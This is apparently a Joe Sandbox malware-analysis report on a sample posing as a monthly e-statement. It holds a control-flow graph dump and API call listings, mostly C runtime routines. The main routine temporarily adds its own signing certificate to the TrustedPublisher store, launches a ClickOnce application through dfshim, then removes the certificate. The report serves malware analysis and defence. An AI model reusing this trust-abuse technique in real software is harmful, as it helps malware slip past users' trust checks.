___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6741->6744 6742 f21e9e _ValidateLocalCookies 6744->6742 6746 f22340 RtlUnwind 6744->6746 6745 f21f27 _ValidateLocalCookies 6746->6745 6197 f23d41 6200 f2341b 6197->6200 6201 f2342a 6200->6201 6202 f23376 15 API calls 6201->6202 6203 f23444 6202->6203 6204 f23376 15 API calls 6203->6204 6205 f2344f 6204->6205 6059 f23d86 6060 f21f7d ___scrt_uninitialize_crt 7 API calls 6059->6060 6061 f23d8d 6060->6061 6206 f29146 IsProcessorFeaturePresent 5955 f298c5 5957 f298ed 5955->5957 5956 f29925 5957->5956 5958 f29917 5957->5958 5959 f2991e 5957->5959 5961 f29997 16 API calls 5958->5961 5964 f29980 5959->5964 5963 f2991c 5961->5963 5965 f299a0 5964->5965 5966 f2a06f __startOneArgErrorHandling 16 API calls 5965->5966 5967 f29923 5966->5967 6062 f24c8a 6067 f24cbf 6062->6067 6065 f24ca6 6066 f24869 _free 15 API calls 6066->6065 6068 f24cd1 6067->6068 6069 f24c98 6067->6069 6070 f24d01 6068->6070 6071 f24cd6 6068->6071 6069->6065 6069->6066 6070->6069 6078 f2681b 6070->6078 6072 f2480c _abort 15 API calls 6071->6072 6074 f24cdf 6072->6074 6076 f24869 _free 15 API calls 6074->6076 6075 f24d1c 6077 f24869 _free 15 API calls 6075->6077 6076->6069 6077->6069 6079 f26826 6078->6079 6080 f2684e 6079->6080 6081 f2683f 6079->6081 6083 f2685d 6080->6083 6087 f27e13 6080->6087 6084 f247f9 __dosmaperr 15 API calls 6081->6084 6094 f27e46 6083->6094 6086 f26844 _abort 6084->6086 6086->6075 6088 f27e33 HeapSize 6087->6088 6089 f27e1e 6087->6089 6088->6083 6090 f247f9 __dosmaperr 15 API calls 6089->6090 6091 f27e23 6090->6091 6092 f2473d _abort 21 API calls 6091->6092 6093 f27e2e 6092->6093 6093->6083 6095 f27e53 6094->6095 6096 f27e5e 6094->6096 6097 f262ff 16 API calls 6095->6097 6098 f27e66 6096->6098 6104 f27e6f _abort 6096->6104 6102 f27e5b 6097->6102 6099 f24869 _free 15 API calls 6098->6099 6099->6102 6100 f27e74 6103 f247f9 __dosmaperr 15 API calls 6100->6103 6101 f27e99 HeapReAlloc 6101->6102 
6101->6104 6102->6086 6103->6102 6104->6100 6104->6101 6105 f26992 _abort 2 API calls 6104->6105 6105->6104 6207 f21248 6208 f21250 6207->6208 6224 f237f7 6208->6224 6210 f2125b 6231 f21664 6210->6231 6212 f2191f 4 API calls 6213 f212f2 6212->6213 6214 f21270 __RTC_Initialize 6222 f212cd 6214->6222 6237 f217f1 6214->6237 6216 f21289 6216->6222 6240 f218ab InitializeSListHead 6216->6240 6218 f2129f 6241 f218ba 6218->6241 6220 f212c2 6247 f23891 6220->6247 6222->6212 6223 f212ea 6222->6223 6225 f23806 6224->6225 6226 f23829 6224->6226 6225->6226 6227 f247f9 __dosmaperr 15 API calls 6225->6227 6226->6210 6228 f23819 6227->6228 6229 f2473d _abort 21 API calls 6228->6229 6230 f23824 6229->6230 6230->6210 6232 f21670 6231->6232 6233 f21674 6231->6233 6232->6214 6234 f21681 ___scrt_release_startup_lock 6233->6234 6235 f2191f 4 API calls 6233->6235 6234->6214 6236 f216ea 6235->6236 6254 f217c4 6237->6254 6240->6218 6292 f23e2a 6241->6292 6243 f218cb 6244 f218d2 6243->6244 6245 f2191f 4 API calls 6243->6245 6244->6220 6246 f218da 6245->6246 6246->6220 6248 f24424 _abort 33 API calls 6247->6248 6250 f2389c 6248->6250 6249 f238d4 6249->6222 6250->6249 6251 f247f9 __dosmaperr 15 API calls 6250->6251 6252 f238c9 6251->6252 6253 f2473d _abort 21 API calls 6252->6253 6253->6249 6255 f217d3 6254->6255 6256 f217da 6254->6256 6260 f23c81 6255->6260 6263 f23cf1 6256->6263 6259 f217d8 6259->6216 6261 f23cf1 24 API calls 6260->6261 6262 f23c93 6261->6262 6262->6259 6266 f239f8 6263->6266 6269 f2392e 6266->6269 6268 f23a1c 6268->6259 6270 f2393a ___scrt_is_nonwritable_in_current_image 6269->6270 6277 f256e2 EnterCriticalSection 6270->6277 6272 f23948 6278 f23b40 6272->6278 6274 f23955 6288 f23973 6274->6288 6276 f23966 _abort 6276->6268 6277->6272 6279 f23b5e 6278->6279 6286 f23b56 _abort 6278->6286 6280 f23bb7 6279->6280 6281 f2681b 24 API calls 6279->6281 6279->6286 6282 f2681b 24 API calls 6280->6282 6280->6286 6283 f23bad 6281->6283 6284 f23bcd 6282->6284 6285 f24869 _free 15 API 
calls 6283->6285 6287 f24869 _free 15 API calls 6284->6287 6285->6280 6286->6274 6287->6286 6291 f2572a LeaveCriticalSection 6288->6291 6290 f2397d 6290->6276 6291->6290 6293 f23e48 6292->6293 6297 f23e68 6292->6297 6294 f247f9 __dosmaperr 15 API calls 6293->6294 6295 f23e5e 6294->6295 6296 f2473d _abort 21 API calls 6295->6296 6296->6297 6297->6243 6106 f21489 6109 f21853 6106->6109 6108 f2148e 6108->6108 6110 f21869 6109->6110 6112 f21872 6110->6112 6113 f21806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6110->6113 6112->6108 6113->6112 5968 f255ce GetCommandLineA GetCommandLineW 6114 f23d8f 6115 f23db2 6114->6115 6116 f23d9e 6114->6116 6117 f24869 _free 15 API calls 6115->6117 6116->6115 6118 f24869 _free 15 API calls 6116->6118 6119 f23dc4 6117->6119 6118->6115 6120 f24869 _free 15 API calls 6119->6120 6121 f23dd7 6120->6121 6122 f24869 _free 15 API calls 6121->6122 6123 f23de8 6122->6123 6124 f24869 _free 15 API calls 6123->6124 6125 f23df9 6124->6125 6747 f2430f 6748 f2431a 6747->6748 6749 f2432a 6747->6749 6753 f24330 6748->6753 6752 f24869 _free 15 API calls 6752->6749 6754 f24343 6753->6754 6757 f24349 6753->6757 6755 f24869 _free 15 API calls 6754->6755 6755->6757 6756 f24869 _free 15 API calls 6758 f24355 6756->6758 6757->6756 6759 f24869 _free 15 API calls 6758->6759 6760 f24360 6759->6760 6761 f24869 _free 15 API calls 6760->6761 6762 f2436b 6761->6762 6763 f24869 _free 15 API calls 6762->6763 6764 f24376 6763->6764 6765 f24869 _free 15 API calls 6764->6765 6766 f24381 6765->6766 6767 f24869 _free 15 API calls 6766->6767 6768 f2438c 6767->6768 6769 f24869 _free 15 API calls 6768->6769 6770 f24397 6769->6770 6771 f24869 _free 15 API calls 6770->6771 6772 f243a2 6771->6772 6773 f24869 _free 15 API calls 6772->6773 6774 f243b0 6773->6774 6779 f241f6 6774->6779 6785 f24102 6779->6785 6781 f2421a 6782 f24246 6781->6782 6798 f24163 6782->6798 6784 f2426a 6784->6752 6786 f2410e ___scrt_is_nonwritable_in_current_image 
6785->6786 6793 f256e2 EnterCriticalSection 6786->6793 6788 f24118 6791 f24869 _free 15 API calls 6788->6791 6792 f24142 6788->6792 6790 f2414f _abort 6790->6781 6791->6792 6794 f24157 6792->6794 6793->6788 6797 f2572a LeaveCriticalSection 6794->6797 6796 f24161 6796->6790 6797->6796 6799 f2416f ___scrt_is_nonwritable_in_current_image 6798->6799 6806 f256e2 EnterCriticalSection 6799->6806 6801 f24179 6802 f243d9 _abort 15 API calls 6801->6802 6803 f2418c 6802->6803 6807 f241a2 6803->6807 6805 f2419a _abort 6805->6784 6806->6801 6810 f2572a LeaveCriticalSection 6807->6810 6809 f241ac 6809->6805 6810->6809 5032 f2130d 5033 f21319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 f2162b 5033->5060 5035 f21320 5036 f21473 5035->5036 5043 f2134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5043 5112 f2191f IsProcessorFeaturePresent 5036->5112 5038 f2147a 5039 f21480 5038->5039 5116 f237e1 5038->5116 5119 f23793 5039->5119 5044 f21369 5043->5044 5045 f213ea 5043->5045 5097 f237a9 5043->5097 5068 f21a34 5045->5068 5052 f21405 5103 f21a6a GetModuleHandleW 5052->5103 5055 f21410 5056 f21419 5055->5056 5105 f23784 5055->5105 5108 f2179c 5056->5108 5061 f21634 5060->5061 5122 f21bd4 IsProcessorFeaturePresent 5061->5122 5065 f21645 5067 f21649 5065->5067 5132 f21f7d 5065->5132 5067->5035 5192 f220b0 5068->5192 5071 f213f0 5072 f23457 5071->5072 5194 f2522b 5072->5194 5074 f213f8 5077 f21000 6 API calls 5074->5077 5075 f23460 5075->5074 5198 f255b6 5075->5198 5078 f211e3 Sleep 5077->5078 5079 f21096 CryptMsgGetParam 5077->5079 5080 f21215 CertCloseStore LocalFree LocalFree LocalFree 5078->5080 5084 f211f7 5078->5084 5081 f21162 CryptMsgGetParam 5079->5081 5082 f210bc LocalAlloc 5079->5082 5080->5052 5081->5078 5083 f21174 CryptMsgGetParam 5081->5083 5085 f21156 LocalFree 5082->5085 5086 f210d7 5082->5086 5083->5078 5087 f21188 CertFindAttribute CertFindAttribute 5083->5087 5084->5080 5088 f2120a CertDeleteCertificateFromStore 
5084->5088 5085->5081 5089 f210e0 LocalAlloc CryptMsgGetParam 5086->5089 5090 f211b1 5087->5090 5091 f211b5 LoadLibraryA GetProcAddress 5087->5091 5088->5084 5092 f21114 CertCreateCertificateContext 5089->5092 5093 f2113d LocalFree 5089->5093 5090->5078 5090->5091 5091->5078 5095 f21133 CertFreeCertificateContext 5092->5095 5096 f21126 CertAddCertificateContextToStore 5092->5096 5093->5089 5094 f2114d 5093->5094 5094->5085 5095->5093 5096->5095 5098 f237d1 _abort 5097->5098 5098->5045 5099 f24424 _abort 33 API calls 5098->5099 5102 f23e9a 5099->5102 5100 f23f24 _abort 33 API calls 5101 f23ec4 5100->5101 5102->5100 5104 f2140c 5103->5104 5104->5038 5104->5055 5686 f2355e 5105->5686 5107 f2378f 5107->5056 5109 f217a8 ___scrt_uninitialize_crt 5108->5109 5110 f21421 5109->5110 5111 f21f7d ___scrt_uninitialize_crt 7 API calls 5109->5111 5110->5044 5111->5110 5113 f21935 _abort 5112->5113 5114 f219e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 f21a24 _abort 5114->5115 5115->5038 5117 f2355e _abort 23 API calls 5116->5117 5118 f237f2 5117->5118 5118->5039 5120 f2355e _abort 23 API calls 5119->5120 5121 f21488 5120->5121 5123 f21640 5122->5123 5124 f21f5e 5123->5124 5138 f224b1 5124->5138 5126 f21f67 5126->5065 5129 f21f6f 5130 f21f7a 5129->5130 5152 f224ed 5129->5152 5130->5065 5133 f21f90 5132->5133 5134 f21f86 5132->5134 5133->5067 5135 f22496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 f21f8b 5135->5136 5137 f224ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 f224ba 5138->5139 5141 f224e3 5139->5141 5143 f21f63 5139->5143 5156 f2271d 5139->5156 5142 f224ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5142 5142->5143 5143->5126 5144 f22463 5143->5144 5173 f2262e 5144->5173 5149 f22493 5149->5129 5151 f22478 5151->5129 5153 f224f8 5152->5153 5155 f22517 5152->5155 5154 f22502 DeleteCriticalSection 5153->5154 5154->5154 5154->5155 5155->5126 5161 f22543 5156->5161 5159 f22740 

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00F21016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00F21025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00F21032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00F21057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00F21063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F21082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00F210B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00F210C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00F210F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00F2110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00F2111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00F2112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00F21134
• LocalFree.KERNEL32(00000000), ref: 00F2113E
• LocalFree.KERNEL32(00000000), ref: 00F2115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00F2116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00F21182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00F21198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00F211A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 00F211BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00F211C6
• Sleep.KERNELBASE(00009C40), ref: 00F211E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 00F2120B
• CertCloseStore.CRYPT32(?,00000000), ref: 00F2121A
• LocalFree.KERNEL32(?), ref: 00F21223
• LocalFree.KERNEL32(?), ref: 00F21228
• LocalFree.KERNEL32(?), ref: 00F2122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: b2627190145e87afb0bc0022df141817151d1fb2773fd589aa1717b862d07f51
• Instruction ID: df936b72a50e6499740f6b1751f964f37cc790ccb325ac6001eac6a8d0bcd841
• Opcode Fuzzy Hash: b2627190145e87afb0bc0022df141817151d1fb2773fd589aa1717b862d07f51
• Instruction Fuzzy Hash: 88613E71E40219AFEB21DB94DC45FAFBBB9FF48B50F140055FA14B7290C771A901ABA8
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F2192B
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F219F7
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F21A10
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F21A1A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                                    • Opcode ID: f6147485a8c9284ab006bbb69a1dbc995bdbad2cfe4c6ccc340a5c370cc45386
                                                                                                                                                                                                                                                                    • Instruction ID: 6721858741b5aed92e8d9e97b03d78ccdd3b09ae766b55f5aef1339542e7a5e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6147485a8c9284ab006bbb69a1dbc995bdbad2cfe4c6ccc340a5c370cc45386
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C311475D012289BDB21DFA4DD49BCDBBB8BF08300F1041AAE40DAB250EB749A85DF45
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F2466B
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F24675
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F24682
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8c9e644e6f3bb3b1c6e742849f19c52c1b539a51fe1bbcd9d34dd581c48df4ed
                                                                                                                                                                                                                                                                    • Instruction ID: 84465f0757d6faaa46da7a8f459d92533af52ebc641b7243f933ef18dd1156cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c9e644e6f3bb3b1c6e742849f19c52c1b539a51fe1bbcd9d34dd581c48df4ed
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131C67490122C9BCB21DF64DD89B8DBBB8BF18310F5041DAE81DA7250E7749F859F45
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000,?,00F23F66,00000003,00F2209F,00F21AFC), ref: 00F23698
                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000,?,00F23F66,00000003,00F2209F,00F21AFC), ref: 00F2369F
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00F236B1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: f065e3abbe6d183d1f7baa366e2432e5c8856d8b9559ffc7784fa0b756f467fb
                                                                                                                                                                                                                                                                    • Instruction ID: c7af0ed2c116413b9ec6a7b5a7dc0679c37da8fe85d04986eb4783c3d585eecf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f065e3abbe6d183d1f7baa366e2432e5c8856d8b9559ffc7784fa0b756f467fb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AE09271410558ABCF22AF54ED09E5A3F69EF40755B044014FA559A231DB39DA42EA50
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                                                                                                                                    • Opcode ID: 10c7ae9274260eef765add62be9d16583cb2b5ad08998321691c47bdca4ecc46
                                                                                                                                                                                                                                                                    • Instruction ID: 497be68279cff455a69fed9c37e1d7640ea6396b4d70e3226fadb4576bcc46f4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10c7ae9274260eef765add62be9d16583cb2b5ad08998321691c47bdca4ecc46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5310671C00219ABCB24CE78DC84EFA7BBDEB85314F004198F519D7251E6B4AD449B50
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F2A490,?,?,00000008,?,?,00F2A130,00000000), ref: 00F2A6C2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                    • Opcode ID: c0f0621df3b7ce3c1834ba3f74a0c3c079a7f72729fd7a96aff70d9dc78c3fc8
                                                                                                                                                                                                                                                                    • Instruction ID: 7dc95715e28d8c44595cce1a2246149a8c44b40855f76975675d786dd003b425
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0f0621df3b7ce3c1834ba3f74a0c3c079a7f72729fd7a96aff70d9dc78c3fc8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99B17D32610618CFD719CF28D48AB657FE0FF05364F298698E89ACF2A1C335D992DB41
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F21BEA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00F21300), ref: 00F21AB1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 54951025-0

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00F2654B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26095
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260A7
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260B9
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260CB
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260DD
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260EF
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26101
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26113
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26125
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26137
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26149
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F2615B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F2616D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26540
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26562
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26577
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26582
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265A4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265B7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265C5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265D0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26608
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2660F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2662C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26644
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24344
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24350
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2435B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24366
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24371
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2437C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24387
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24392
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2439D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F243AB
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
